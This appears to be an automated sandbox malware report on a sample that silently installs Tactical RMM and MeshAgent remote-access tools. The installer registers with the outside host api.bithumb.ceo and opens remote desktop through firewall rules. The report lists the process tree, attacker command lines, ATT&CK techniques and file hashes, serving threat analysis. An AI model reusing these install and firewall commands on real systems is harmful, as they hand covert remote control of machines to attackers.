Token: SeAssignPrimaryTokenPrivilege	4480	wmic.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
5044	tacticalagent-v2.6.1-windows-amd64.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3804 wrote to memory of 4624	3804	SecuriteInfo.com.W64.Bulz.AY.gen.Eldorado.23576.26484.exe	86
PID 3804 wrote to memory of 4624	3804	SecuriteInfo.com.W64.Bulz.AY.gen.Eldorado.23576.26484.exe	86
PID 3804 wrote to memory of 4624	3804	SecuriteInfo.com.W64.Bulz.AY.gen.Eldorado.23576.26484.exe	86
PID 4624 wrote to memory of 5044	4624	tacticalagent-v2.6.1-windows-amd64.exe	87
PID 4624 wrote to memory of 5044	4624	tacticalagent-v2.6.1-windows-amd64.exe	87
PID 4624 wrote to memory of 5044	4624	tacticalagent-v2.6.1-windows-amd64.exe	87
PID 5044 wrote to memory of 968	5044	tacticalagent-v2.6.1-windows-amd64.tmp	88
PID 5044 wrote to memory of 968	5044	tacticalagent-v2.6.1-windows-amd64.tmp	88
PID 5044 wrote to memory of 968	5044	tacticalagent-v2.6.1-windows-amd64.tmp	88
PID 968 wrote to memory of 1724	968	cmd.exe	90
PID 968 wrote to memory of 1724	968	cmd.exe	90
PID 968 wrote to memory of 1724	968	cmd.exe	90
PID 968 wrote to memory of 624	968	cmd.exe	101
PID 968 wrote to memory of 624	968	cmd.exe	101
PID 968 wrote to memory of 624	968	cmd.exe	101
PID 624 wrote to memory of 2848	624	net.exe	100
PID 624 wrote to memory of 2848	624	net.exe	100
PID 624 wrote to memory of 2848	624	net.exe	100
PID 5044 wrote to memory of 1332	5044	tacticalagent-v2.6.1-windows-amd64.tmp	99
PID 5044 wrote to memory of 1332	5044	tacticalagent-v2.6.1-windows-amd64.tmp	99
PID 5044 wrote to memory of 1332	5044	tacticalagent-v2.6.1-windows-amd64.tmp	99
PID 1332 wrote to memory of 2712	1332	cmd.exe	92
PID 1332 wrote to memory of 2712	1332	cmd.exe	92
PID 1332 wrote to memory of 2712	1332	cmd.exe	92
PID 2712 wrote to memory of 2056	2712	net.exe	98
PID 2712 wrote to memory of 2056	2712	net.exe	98
PID 2712 wrote to memory of 2056	2712	net.exe	98
PID 5044 wrote to memory of 4160	5044	tacticalagent-v2.6.1-windows-amd64.tmp	94
PID 5044 wrote to memory of 4160	5044	tacticalagent-v2.6.1-windows-amd64.tmp	94
PID 5044 wrote to memory of 4160	5044	tacticalagent-v2.6.1-windows-amd64.tmp	94
PID 4160 wrote to memory of 3368	4160	cmd.exe	95
PID 4160 wrote to memory of 3368	4160	cmd.exe	95
PID 4160 wrote to memory of 3368	4160	cmd.exe	95
PID 4160 wrote to memory of 4168	4160	cmd.exe	108
PID 4160 wrote to memory of 4168	4160	cmd.exe	108
PID 4160 wrote to memory of 4168	4160	cmd.exe	108
PID 4168 wrote to memory of 4400	4168	net.exe	106
PID 4168 wrote to memory of 4400	4168	net.exe	106
PID 4168 wrote to memory of 4400	4168	net.exe	106
PID 5044 wrote to memory of 4336	5044	tacticalagent-v2.6.1-windows-amd64.tmp	103
PID 5044 wrote to memory of 4336	5044	tacticalagent-v2.6.1-windows-amd64.tmp	103
PID 5044 wrote to memory of 4336	5044	tacticalagent-v2.6.1-windows-amd64.tmp	103
PID 4336 wrote to memory of 2396	4336	cmd.exe	105
PID 4336 wrote to memory of 2396	4336	cmd.exe	105
PID 4336 wrote to memory of 2396	4336	cmd.exe	105
PID 5044 wrote to memory of 2700	5044	tacticalagent-v2.6.1-windows-amd64.tmp	114
PID 5044 wrote to memory of 2700	5044	tacticalagent-v2.6.1-windows-amd64.tmp	114
PID 5044 wrote to memory of 2700	5044	tacticalagent-v2.6.1-windows-amd64.tmp	114
PID 2700 wrote to memory of 2452	2700	cmd.exe	113
PID 2700 wrote to memory of 2452	2700	cmd.exe	113
PID 2700 wrote to memory of 2452	2700	cmd.exe	113
PID 5044 wrote to memory of 4684	5044	tacticalagent-v2.6.1-windows-amd64.tmp	111
PID 5044 wrote to memory of 4684	5044	tacticalagent-v2.6.1-windows-amd64.tmp	111
PID 5044 wrote to memory of 4684	5044	tacticalagent-v2.6.1-windows-amd64.tmp	111
PID 4684 wrote to memory of 552	4684	cmd.exe	112
PID 4684 wrote to memory of 552	4684	cmd.exe	112
PID 4684 wrote to memory of 552	4684	cmd.exe	112
PID 5044 wrote to memory of 932	5044	tacticalagent-v2.6.1-windows-amd64.tmp	116
PID 5044 wrote to memory of 932	5044	tacticalagent-v2.6.1-windows-amd64.tmp	116
PID 5044 wrote to memory of 932	5044	tacticalagent-v2.6.1-windows-amd64.tmp	116
PID 932 wrote to memory of 4496	932	cmd.exe	117
PID 932 wrote to memory of 4496	932	cmd.exe	117
PID 5044 wrote to memory of 4664	5044	tacticalagent-v2.6.1-windows-amd64.tmp	121
PID 5044 wrote to memory of 4664	5044	tacticalagent-v2.6.1-windows-amd64.tmp	121

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.W64.Bulz.AY.gen.Eldorado.23576.26484.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.W64.Bulz.AY.gen.Eldorado.23576.26484.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3804
- C:\ProgramData\TacticalRMM\tacticalagent-v2.6.1-windows-amd64.exe
  C:\ProgramData\TacticalRMM\tacticalagent-v2.6.1-windows-amd64.exe /VERYSILENT /SUPPRESSMSGBOXES
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4624
- - C:\Users\Admin\AppData\Local\Temp\is-RJ6S4.tmp\tacticalagent-v2.6.1-windows-amd64.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-RJ6S4.tmp\tacticalagent-v2.6.1-windows-amd64.tmp" /SL5="$601C0,3642621,825344,C:\ProgramData\TacticalRMM\tacticalagent-v2.6.1-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:5044
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
      4⤵
      Suspicious use of WriteProcessMemory
      PID:968
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 2
        5⤵
        Runs ping.exe
        
        PID:1724
    - - C:\Windows\SysWOW64\net.exe
        
        net stop tacticalrpc
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:624
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4160
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 2
        5⤵
        Runs ping.exe
        
        PID:3368
    - - C:\Windows\SysWOW64\net.exe
        
        net stop tacticalrmm
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4168
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c net stop tacticalagent
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1332
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4336
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM tacticalrmm.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2396
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c sc delete tacticalrpc
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4684
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete tacticalrpc
        5⤵
        Launches sc.exe
        
        PID:552
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c sc delete tacticalagent
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2700
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c tacticalrmm.exe -m installsvc
      4⤵
      Suspicious use of WriteProcessMemory
      PID:932
    - - C:\Program Files\TacticalAgent\tacticalrmm.exe
        
        tacticalrmm.exe -m installsvc
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4496
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c net start tacticalrmm
      4⤵
      PID:4664
- C:\Program Files\TacticalAgent\tacticalrmm.exe
  "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.bithumb.ceo --client-id 8 --site-id 8 --agent-type server --auth c057c1d4b81b1f2c4d7117cc3586c007a513bffa6aa0e3c62c7aab939f9860b7 -rdp -ping
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4940
- - C:\Program Files\TacticalAgent\meshagent.exe
    "C:\Program Files\TacticalAgent\meshagent.exe" -fullinstall
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    PID:3636
- - C:\Program Files\Mesh Agent\MeshAgent.exe
    "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
    3⤵
    - Executes dropped EXE
    PID:1968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C netsh advfirewall firewall add rule name="ICMP Allow incoming V4 echo request" protocol=icmpv4:8,any dir=in action=allow
    3⤵
    PID:2800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
    3⤵
    PID:2932

C:\Windows\SysWOW64\net.exe
net stop tacticalagent
1⤵
- Suspicious use of WriteProcessMemory
PID:2712
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop tacticalagent
  2⤵
  PID:2056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tacticalrpc
1⤵
PID:2848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tacticalrmm
1⤵
PID:4400

C:\Windows\SysWOW64\sc.exe
sc delete tacticalagent
1⤵
- Launches sc.exe
PID:2452

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start tacticalrmm
1⤵
PID:3340

C:\Windows\SysWOW64\net.exe
net start tacticalrmm
1⤵
PID:5108

C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:396
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1464
- C:\Windows\system32\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4092
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4480
- C:\Windows\system32\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:1472
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:864
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4388

C:\Program Files\TacticalAgent\tacticalrmm.exe
"C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2172
- C:\Program Files\TacticalAgent\py38-x64\python.exe
  "C:\Program Files\TacticalAgent\py38-x64\python.exe" C:\ProgramData\TacticalRMM\4276358872.py
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1256
- C:\Program Files\Mesh Agent\MeshAgent.exe
  "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
  2⤵
  - Executes dropped EXE
  PID:2408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass C:\ProgramData\TacticalRMM\2589180277.ps1
  2⤵
  - Blocklisted process makes network request
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:1356
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\3zttoivb\3zttoivb.cmdline"
    3⤵
    PID:2064
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES328.tmp" "c:\Windows\Temp\3zttoivb\CSCA524BF80BD45486A9249B9D4CE57FA60.TMP"
      4⤵
      PID:4752
- - C:\Windows\System32\setx.exe
    "C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate "133512351684972292"
    3⤵
    PID:3932
- - C:\Windows\System32\setx.exe
    "C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate "133512351690126243"
    3⤵
    PID:2676
- - C:\ProgramData\chocolatey\choco.exe
    "C:\ProgramData\chocolatey\choco.exe" -v
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    PID:1004
- C:\Program Files\TacticalAgent\tacticalrmm.exe
  "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m checkrunner
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3160

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="ICMP Allow incoming V4 echo request" protocol=icmpv4:8,any dir=in action=allow
1⤵
- Modifies Windows Firewall
PID:1636

C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
1⤵
- Modifies Windows Firewall
PID:4004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mesh Agent\MeshAgent.exe

Filesize
1.6MB

MD5
e40814bb1b57a351123753fcf1476c0e

SHA1
148005db331c155b9085ea9021d3701d9d814c69

SHA256
2b6250d78554a69ab5eb3ebd0bf2141d17f663ee4da057972c00f2bc3aed4379

SHA512
97d6a559763d44b7df04c5af1b0e17417ee646f9d86786c47c8c3c357c55eb9b214d61ef149888aeb3a03514ffb0c292d472bef5bd87f1bd712762f765e6c3ef

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.exe

Filesize
48KB

MD5
4714c95328c420294271e669b3c361e6

SHA1
2018b613fffe76589d8ad5e4059a9368dca2ab54

SHA256
c2ce6b8c59303b6f7bc4499385d8f2f4567d967d8e747e4bafafcc718852eede

SHA512
2751029a9a9d9d9294bd6405a5f41ce8a75531489498fc071ed8b24f961a1367e79450137e4b77c60c387eb2b208b804c10474037f76a01fb0ed950f33d94aa0

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.exe

Filesize
1.0MB

MD5
5551e770f0af748157d2ed4c340b3c8e

SHA1
04481ee3d2c2eeeb0cde25147d76b34af946bdac

SHA256
9738ac5f2a793554ca3ada81d56bae25e0b6136a48f3b763bb81eedb91bc53c5

SHA512
6d425bf80dd3151da7ddb8238825a5c9ec3349e1a39d618e20b6c4bf32afafe8f468857bcca7d728ea712adbe55e652a01d006c1c4007f6e0856cf67b6192c16

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.exe

Filesize
930KB

MD5
da34f043b058c9cb3aca87e85fb497b1

SHA1
47c902bed4f8cd84cee00fb54b92526d48ed9a8e

SHA256
c5e736e1952922f5b373555e93053095b6cfe1fbfe730d9d9d7b6a2c6df8046d

SHA512
3150283c549259f5419f1251cce79c522d47b2479c38006a0b84a654cd5c407a7fd58441adbc9fffcead958e537cbc94cafaf53b3704c3055ecb2856d9614359

Download Submit
C:\Program Files\TacticalAgent\agent.log

Filesize
67B

MD5
c77cb50a05c0ef53f5f8592d6957ac12

SHA1
923137ed742b9d4b54b671d054562f998af44744

SHA256
e9164fd3bd362108282cf8df905965501f1c0acee0fccc92fd76077553bc30f2

SHA512
2efec2838e55a401a01f8d12235a0dd30989e300b2d47a2a64f41f8e8431f86e62c66f07dd0aff4a189f8a6ab54478ed87467b0cdb8a6c4c6d3aca52ddf95a98

Download Submit
C:\Program Files\TacticalAgent\meshagent.exe

Filesize
64KB

MD5
c5a2cda4c3c3f286ffe796ca36a22dd9

SHA1
ab361aa9a444145241808183293e112bd4fd11d4

SHA256
0752c7155be1ef32e116e7dafdeb4779911f1b35ede415aede546d6dd94c6ac7

SHA512
fcfd9f51355e0ec605932d0234b0296d1df5bda261028fc7cd53592502f5d72e90f2f5eead58d5b86d5bbb07e7948e0bc65f8f37ad1864e310ddabb1f1f6e7f4

Download Submit
C:\Program Files\TacticalAgent\meshagent.exe

Filesize
76KB

MD5
c4f33a38ddfa6cdc3e5610cb76ac054f

SHA1
7b7b2cd4f34113427e2fefb47edfa50d7b56f333

SHA256
24f6861e04aff362d480e478187b18d24d4ae4be0c7e38d272d7ec6665a47ca0

SHA512
35856a08085921c4f77ba06395d8049b0ba9e11f468e9c6ed14123f3ca80f170d73265fda5d32c16b907051b3b3e6f0840ee258b3acea7cbff29762fd94c08f1

Download Submit
C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\msgpack-1.0.2.dist-info\INSTALLER

Filesize
4B

MD5
365c9bfeb7d89244f2ce01c1de44cb85

SHA1
d7a03141d5d6b1e88b6b59ef08b6681df212c599

SHA256
ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508

SHA512
d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

Download Submit
C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\psutil\__init__.py

Filesize
84KB

MD5
29e928c48046a0050384f17b0f26fd1b

SHA1
cdd96ed3b4c13bd3c426a20f204cb66099b5b801

SHA256
9018329d8ceec4d5ea155a4235d4ebd11a92991f93a9c1eb68379d076c9c3da9

SHA512
29d4cf31640b3d4803429767d2c633ea18299962e9be61b22d87f141e4b267bcad89f326838251f0f3dc12d00034100e6ca38a9397663ebba46536b1e9e6323a

Download Submit
C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\psutil\_common.py

Filesize
25KB

MD5
3f9c08b651ba10b38523056bb759df97

SHA1
e2fa44cfecf3584a520d30f92aaed5dd5bc1557d

SHA256
21e8fdb9ad3f1f873e96098ac77c415831d13fe3dbe2ccd4f9035bf1c37a77c3

SHA512
14be301347da84fe06c1ba831dcedbaf4c0ec17068f278f21502fb833769d51b542d18468d3576166044343510f74ffea6e426022840a6e6d089c7088105f096

Download Submit
C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\psutil\_compat.py

Filesize
14KB

MD5
18815fac376509e8788c9d10d657d6a5

SHA1
c8df6c23a7f33743fee473d883c34119b23dd0e8

SHA256
c2219368b16a08d52b085bc57d15e9e18de09f9162ab32d41554c2a7a180ded6

SHA512
e4182721ae6e85f717e494a9ddce7373ee9640a1fe1a0c5006078f5b2362a0702ad1198c370d1de2a237e4a496cd30a0eab4eab0daf734559cbd758eb9ab7fec

Download Submit
C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\psutil\_psutil_windows.cp38-win_amd64.pyd

Filesize
76KB

MD5
81467ae2ccfd303b3ae249b271d02393

SHA1
025316c0ffd42bb6085731596b5e5cf36a2ee400

SHA256
b8dfb9df359c67334c017a8bdcad257e4ed5ef1637761acf40d19c4df040f8e1

SHA512
3d4f02a97298d894e351514c9d719730b7de4baace38fcf395275bdde399158d35d10533a5ae762c24b748594e64109112a8d88f1b76b15beb2af47bc7db272e

Download Submit
C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\psutil\_pswindows.py

Filesize
35KB

MD5
eda393df7596c2e58acf6d6d9efa505c

SHA1
1e7b90375c14d22cf106da61bdb25a80e7eabcb3

SHA256
2727df1f1d0f991258fb81672f479ebcf766ae707b77de80b95ea64ef51abcf7

SHA512
6f4615d20859e4af10036de605e259fa489c1d0f40701cbaa3f5f128478b3b58617385264f216f836ed6198e0f65a65a90a9267152dd63a57af4682a12b9d709

Download Submit
C:\Program Files\TacticalAgent\py38-x64\Scripts\pip.exe

Filesize
103KB

MD5
04a22a5a23becd048a798ce7a081c9c6

SHA1
b2d4e43bf350402995c1b433237d9dad4f930f08

SHA256
53b1071fccaa53404e1fbdfeb53e062f4a1e7ef57dc959709ecb38984e4291e6

SHA512
37cb79d91c2819386980af44d8f2f39abc3773b9d958f6cb4a57d3b4f8438fdfc053d188d0148f3373940c8ff68ce21d08779d21ba0b8d6bfea7ac0053e55868

Download Submit
C:\Program Files\TacticalAgent\py38-x64\VCRUNTIME140.dll

Filesize
91KB

MD5
7942be5474a095f673582997ae3054f1

SHA1
e982f6ebc74d31153ba9738741a7eec03a9fa5e8

SHA256
8ee6b49830436ff3bec9ba89213395427b5535813930489f118721fd3d2d942c

SHA512
49fbc9d441362b65a8d78b73d4fdcf988f22d38a35a36a233fcd54e99e95e29b804be7eabe2b174188c7860ebb34f701e13ed216f954886a285bed7127619039

Download Submit
C:\Program Files\TacticalAgent\py38-x64\_bz2.pyd

Filesize
85KB

MD5
6fd0281bca7eee0f354a91f958714edb

SHA1
c7f643955d589f6d3093459327dcaab3b7ae4a32

SHA256
03d8966f4d8ab347140a3ad9938fb91db11e01e028e980721451070eb0483cf7

SHA512
86b2944acac0601273a7534b5698991ed0475cc3f913f179fad27aa8cb7732ea56d9e70b6e959fb55795384ed652565586b8a10474864daa4874321f31b4a416

Download Submit
C:\Program Files\TacticalAgent\py38-x64\_lzma.pyd

Filesize
160KB

MD5
0caa4da7b74fc8e8f08ba736274bdb46

SHA1
4b46dc22c81fa3558537249c994614def1fd8cce

SHA256
167c5550b93541c703c8afeb4d912719d5039230a7efce8f4bc500f175252ed8

SHA512
47f1f338ea4055a4b88691ebb511ee95d29943aa7d519a7d5f513bef26641990c1f31ad2839e7ed0342a5a262255b770ca922f7d173c998e0ff11c594bf8efab

Download Submit
C:\Program Files\TacticalAgent\py38-x64\_socket.pyd

Filesize
78KB

MD5
49f417de4aaae069d5b2d5d5a4ddabe1

SHA1
56772fe3d3a7f7865d412e3b27c11ec7e7c9e3c1

SHA256
f1930ca4c78029fb41f3f661194b9d3001d0a99f45d68bf3a4a87d9ea36aad20

SHA512
83f5be813cb8c0d738dbc27ab45ac561aa0dfe65c5caf72f47a72e3afa05e7e750ac63cf9a42a983a86ce33b25bb1426e0b2e78d62598616fd040b72c34419f4

Download Submit
C:\Program Files\TacticalAgent\py38-x64\lib\site-packages\distutils-precedence.pth

Filesize
152B

MD5
c39367750a2ad85b290fa7595d4cc457

SHA1
4e2b7b413113994e4730efe03e564a84cebe2d73

SHA256
7ea7ffef3fe2a117ee12c68ed6553617f0d7fd2f0590257c25c484959a3b7373

SHA512
40e5b4813f24601ad581c93fa0115454ef89e61f6b911644e3b89946280ff97cbd46ae00287d8dc71392ef6c940ebaa173d2e3c32df72f0aa27d65ed73fe37c1

Download Submit
C:\Program Files\TacticalAgent\py38-x64\lib\site-packages\pywin32.pth

Filesize
178B

MD5
322bf8d4899fb978d3fac34de1e476bb

SHA1
467808263e26b4349a1faf6177b007967fbc6693

SHA256
4f67ff92af0ea38bf18ac308efd976f781d84e56f579c603ed1e8f0c69a17f8d

SHA512
d7264690d653ac6ed4b3d35bb22b963afc53609a9d14187a4e0027528b618c224ed38e225330ceae2565731a4e694a6146b3214b3dcee75b053c8ae79f24a9dd

Download Submit
C:\Program Files\TacticalAgent\py38-x64\lib\site-packages\win32\lib\pywin32_bootstrap.py

Filesize
1KB

MD5
aed445c9ae029c32024488c91d032b88

SHA1
1af77921a78ac4a2cc092e215bda51abfd01c88a

SHA256
b6cdd081733949bf8d18ba46044e612935eba6d8abab5b0633be1cf453560524

SHA512
a02b78741910fffde9e747b77e2d9764bae305a895be75fa8a85165c7637d80422c3246d8b1802025050c69f4cc2d959e27ef10f3fa3bc9c3ba962d85b6ff36c

Download Submit
C:\Program Files\TacticalAgent\py38-x64\python.exe

Filesize
99KB

MD5
2cb5342cd2186c024b707d16abe917bc

SHA1
80d45803ad13242360206669b4cee11b6f11b3f3

SHA256
0c311c7dbd354faae60cee5f79217122a6e565ae46f60f5bf799f18792672e29

SHA512
9fca0698ade1a29d7cd276b90eb656149bb4c1259cd6395163de8025af648a309315521967ca690e74b2c65011e99c0878456dae2f0cce6fbb52972af958a2bd

Download Submit
C:\Program Files\TacticalAgent\py38-x64\python3.dll

Filesize
58KB

MD5
ed316d674cd49b708593b6927a0dc5e2

SHA1
4d12f9ab0560e6956f5b07f01fb40063c8892e17

SHA256
65dfe9736308538a4b3296d642364edfe9f90d852e5d0ff2fe1c0f1e72015e20

SHA512
6e3996ea47566487090732134561301ddbd5a3a03810f3bd24b24dfabf9a95a80b2b9f074cefc87e6a74595917d324f01b9a2d4fe97dd20c12972788379b9133

Download Submit
C:\Program Files\TacticalAgent\py38-x64\python38._pth

Filesize
97B

MD5
b1c6214b5d61ddd9fc539bcb34354522

SHA1
b31126bd8ed4e6e248cc996d3449b420e3dfc612

SHA256
7ca255a8508b797b440802745752e202d97b085e4bcb8c35a6333f08d71bb195

SHA512
571819fe3c9d6d2b07789a7de0be5b77dbe5dfc90741856c5a44bcbcbec75016730cbd5bfffd63105729bd65f7a1166cfc9cb6f593ef71a8efc966c8515e8b7b

Download Submit
C:\Program Files\TacticalAgent\py38-x64\python38.dll

Filesize
1.2MB

MD5
9e4282bf6c3bda1a355a0907a6ba42e8

SHA1
bfde15e6e0209c44d59f0ef413e5fe316275c765

SHA256
438a080f6af755b97ede3f3d9ed946b15ef989c3125e3ef84d7c4bde801c7f10

SHA512
3662448b7e3579746d8524d4527bee20481165c9877990e8db65d7868dc09a9e8497488fe50dfb33f5a183603b54d058ef15bb491aad0c05d5c8b7d099877abf

Download Submit
C:\Program Files\TacticalAgent\py38-x64\python38.dll

Filesize
1.2MB

MD5
6deeb4715bc674aaa788b879975449f3

SHA1
e5cb907bdfbd77734ea40e3001ed5eebfe22b606

SHA256
a6047091909569f0e1165ece24a48ec360d90c13f59076898f2743d90d409247

SHA512
f105349df702b9aff37ca34de1c60a6ecdbe20fd514e194d93286a1d0e4e2d26ea68b7b6b798520339bd6086f9d417b355093f2d083580c85378ef412e37ef06

Download Submit
C:\Program Files\TacticalAgent\py38-x64\python38.zip

Filesize
1011KB

MD5
0875059443761a3ea4131b913dd0106e

SHA1
4956800fca259363ba1479ec6db6cd13bfb2e5cd

SHA256
c2eef399b54042cfdd140352625b34b4a7fe7136f251c9c3acf727c9a031f2eb

SHA512
7242ef984652219f9f4ae0d7a07e7106e3ad0081adb406093adc4ef689507b136b35b8ed3e956c501a4d4415bd5426849354d31e1acbcba4d6975c5394cb00df

Download Submit
C:\Program Files\TacticalAgent\py38-x64\select.pyd

Filesize
27KB

MD5
f3702dfaffad5d95ac7022abf84440f3

SHA1
a78d5994aad9a82b8cfaff1ef4eaba38bab9ce7e

SHA256
cea18e860d251fbf4e9bf6e8689ba23b43db4cdb9fd421270e8ed1c3b1aa4401

SHA512
07cadc08bfb86633c8d54b717fb06217af0c586ddade537a6000ae662d2adbd3107e30d32f28130041357d108eaf1f67a13ae3858be0d18daf2123666d2c26c5

Download Submit
C:\Program Files\TacticalAgent\tacticalrmm.exe

Filesize
46KB

MD5
d87fde751b47786370e15542b3b4ec25

SHA1
1e2be3a2cf4224c4dd281776613a923a5cfa104c

SHA256
bd01e876bc49282ded3af45cc9218548728d0f528da479dac297882da29b0600

SHA512
0d5ec2a795d306a5bd8a31ea7974391285e0e777b7122bb11c630a9cbaa45b2f7fa8580fcb97ea7a977756284569cb07f47db6403c59f6692a1f96ca8c01a8b9

Download Submit
C:\Program Files\TacticalAgent\tacticalrmm.exe

Filesize
265KB

MD5
a7aef65c7792d6c771a53363d5dcf028

SHA1
5d38831c7b844d25f94a1fcc9d08c3613a6b1220

SHA256
80b104458505cf2d90ad02abdbdd422251470cc3b6e219a2e6a981afc71b9675

SHA512
0522bde7d7ab739f2e416a0a15f177040206686eb292e976206ddd6f45f085dd07ae71235479fd48b7629dc72b506468ad9fd12b3e64dc628de47389273b35bd

Download Submit
C:\Program Files\TacticalAgent\tacticalrmm.exe

Filesize
302KB

MD5
dcb83560f82525666580d62b83999fc4

SHA1
